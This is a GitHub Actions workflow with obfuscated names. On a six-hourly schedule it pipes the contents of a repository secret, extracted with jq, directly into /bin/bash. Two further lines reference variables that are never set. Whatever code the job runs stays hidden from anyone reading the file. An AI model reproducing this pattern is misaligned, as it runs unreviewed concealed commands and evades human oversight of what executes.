name: haojingbotao
on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'
jobs:  # 15499
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haojingbotao
        env:
          li82: ${{ secrets.li82 }}
        run: |
          echo $li82 | jq -r .dcmo852 | /bin/bash
          echo $gkhw8537 | jq -r .k81898 | /bin/bash
          echo $dprlj8993 | jq -r .vezno75484 | /bin/bash

